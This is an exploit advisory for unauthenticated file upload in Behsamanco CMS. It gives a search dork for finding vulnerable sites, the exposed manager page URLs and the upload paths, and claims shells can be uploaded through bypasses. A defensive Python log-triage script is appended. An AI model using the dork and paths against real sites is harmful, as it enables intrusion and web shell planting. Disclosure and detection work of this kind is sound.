Behsamanco Cms File Upload Vulnerability

Author: Iran Cyber Security Group, Published: 01-04-2015
# Exploit Title : Behsamanco Cms File Upload Vulnerability
# Date : 09/03/2015
# Exploit Author : Iran Cyber Security Group
# Contact : whit3_w01f@att.net
# Category : Web Application Bugs
# Dork : inurl:Repositary/RadEditor/SentDoc/Guest/
# Tested On : Windows
# Home : Iran-Cyber.Org

1. Description

This vulnerability allows you to upload files in these formats: .swf, .mp3, .mp4, .jpg, .gif, .jpeg, .txt, .docx, .doc, but you can upload shells with bypasses.

2. Proof of Concept

1. Upload .txt File

After you have searched the dork and found a target, use this exploit to upload a .txt file:

site.com/Pages/Admin/CKEditor/DocumentManager.aspx

Now you can create or delete a folder, and upload or delete .txt, .docx or .doc files.

Uploaded file URL: site.com/Repositary/RadEditor/SentDoc/Guest/foldername/filename.txt

foldername is the name of the folder you uploaded the file into, and filename is the name of the file you uploaded.

If you didn't put it in a folder, this is the uploaded file URL:

site.com/Repositary/RadEditor/SentDoc/Guest/filename.txt

2. Upload Image

After you have searched the dork and found a target, use this exploit to upload an image:

site.com/Pages/Admin/CKEditor/FlashManager.aspx

Now you can create or delete a folder, and upload or delete images.

Uploaded file URL: site.com/Repositary/RadEditor/SentImages/Guest/foldername/filename.jpg

foldername is the name of the folder you uploaded the file into, and filename is the name of the file you uploaded.

If you didn't put it in a folder, this is the uploaded file URL:

site.com/Repositary/RadEditor/SentImages/Guest/filename.jpg

3. Upload Flash Files

After you have searched the dork and found a target, use this exploit to upload Flash (.swf) files:

site.com/Pages/Admin/CKEditor/FlashManager.aspx

Now you can create or delete a folder, and upload or delete .swf files.

Uploaded file URL: site.com/Repositary/RadEditor/SentFlashes/Guest/foldername/filename.swf

foldername is the name of the folder you uploaded the file into, and filename is the name of the file you uploaded.

If you didn't put it in a folder, this is the uploaded file URL:

site.com/Repositary/RadEditor/SentFlashes/Guest/filename.swf

4. Upload Media

After you have searched the dork and found a target, use this exploit to upload media (.mp3 and .mp4 files):

site.com/Pages/Admin/CKEditor/MediaManager.aspx

Now you can create or delete a folder, and upload or delete .mp3 and .mp4 files.

Uploaded file URL: site.com/Repositary/RadEditor/SentMedia/Guest/foldername/filename.mp3 or filename.mp4

foldername is the name of the folder you uploaded the file into, and filename is the name of the file you uploaded.

If you didn't put it in a folder, this is the uploaded file URL:

site.com/Repositary/RadEditor/SentMedia/Guest/filename.mp3 or filename.mp4

ENJOY !
=====================
Greetz : root3r | Sheytan Azzam | Mohamad-Nofozi | KamraN HellisH | CRY$I$ | Jok3r | Alireza_ProMis | Pi.Hack |xX-AlibalA-Xx | Erfan Mig | Siyahi |
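
For defenders, an added example (not part of the original advisory): a Python triage script that scans IIS W3C log lines for successful requests to the three manager pages and for files served from the Guest upload folders that fall outside the extension list in the description. The log field order, the sample lines and the function names are assumptions made for illustration.

```python
import re
from urllib.parse import unquote

# Paths and extensions are the ones listed in the advisory.
MANAGER_RE = re.compile(
    r"^/Pages/Admin/CKEditor/(Document|Flash|Media)Manager\.aspx$", re.I)
GUEST_RE = re.compile(
    r"^/Repositary/RadEditor/Sent(Doc|Images|Flashes|Media)/Guest/(.+)$", re.I)
ALLOWED_EXT = {"swf", "mp3", "mp4", "jpg", "gif", "jpeg", "txt", "docx", "doc"}
# Assumed field order; match it to the #Fields: header of your own logs.
FIELDS = "date time c-ip cs-method cs-uri-stem sc-status".split()

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem sc-status
2015-03-09 10:00:01 203.0.113.7 GET /Pages/Admin/CKEditor/DocumentManager.aspx 200
2015-03-09 10:00:09 203.0.113.7 POST /Pages/Admin/CKEditor/DocumentManager.aspx 200
2015-03-09 10:00:15 203.0.113.7 GET /Repositary/RadEditor/SentDoc/Guest/test/note.txt 200
2015-03-09 10:01:02 203.0.113.7 GET /Repositary/RadEditor/SentDoc/Guest/test/page.aspx 200
2015-03-09 10:02:00 198.51.100.4 GET /Pages/Admin/CKEditor/MediaManager.aspx 302
2015-03-09 10:03:00 198.51.100.4 GET /default.aspx 200
"""

def classify(line):
    """Return a finding string for one log line, or None if unremarkable."""
    parts = line.split()
    if line.startswith("#") or len(parts) != len(FIELDS):
        return None
    rec = dict(zip(FIELDS, parts))
    path = unquote(rec["cs-uri-stem"])
    if not rec["sc-status"].startswith("2"):
        return None  # redirects to login and errors are not findings
    if MANAGER_RE.match(path):
        return f"manager-access {rec['c-ip']} {rec['cs-method']} {path}"
    m = GUEST_RE.match(path)
    if m:
        stem, dot, ext = m.group(2).rsplit("/", 1)[-1].rpartition(".")
        # Accept only "<plain name>.<allowlisted ext>"; everything else is reviewed.
        if not dot or ext.lower() not in ALLOWED_EXT or not re.fullmatch(r"[\w\- ]+", stem):
            return f"unexpected-file {rec['c-ip']} {path}"
    return None

def scan(text):
    """Classify every line of a log and keep only the findings."""
    return [f for f in map(classify, text.splitlines()) if f]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A `manager-access` hit with a 2xx status from an address that is not an administrator's means the manager page was reachable and should be placed behind authentication; an `unexpected-file` hit means the upload folder should be inspected and script execution disabled for it.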